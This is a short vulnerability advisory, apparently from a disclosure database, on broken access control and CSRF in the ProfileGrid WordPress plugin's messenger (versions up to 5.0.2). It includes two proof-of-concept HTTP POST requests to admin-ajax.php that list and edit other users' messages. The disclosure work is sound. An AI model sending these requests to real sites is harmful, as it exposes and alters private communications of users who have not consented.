ProfileGrid by Metagauss

The plugin was affected by Broken Access Control and Cross-Site Request Forgery (CSRF) vulnerabilities.

The plugin creates a frontend user profile, groups, communities and messenger. However, the messenger is vulnerable because there is no user authentication, so the vulnerability allows us to list and modify other users’ messages.

Proof of Concept

To list other users’ messages:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_show_messages&tid=1

To edit another user’s message:

POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c

ProfileGrid by Metagauss <= 5.0.2 - Subscriber+ List and Edit Messages

Proof of Concept

References

Attributes

Classification

Researcher